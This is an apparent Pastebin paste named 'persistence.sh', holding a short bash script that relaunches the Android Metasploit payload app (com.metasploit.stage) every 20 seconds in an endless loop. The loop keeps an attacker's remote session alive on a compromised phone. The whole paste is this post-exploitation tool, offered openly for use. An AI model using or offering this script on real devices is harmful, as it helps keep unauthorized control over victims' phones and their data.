SUP3R-US3R

persistence.sh

May 12th, 2017
7,057
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.13 KB | None | 0 0
  1. #!/bin/bash
  2. while true
  3. do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
  4. sleep 20
  5. done
Add Comment
Please, Sign In to add comment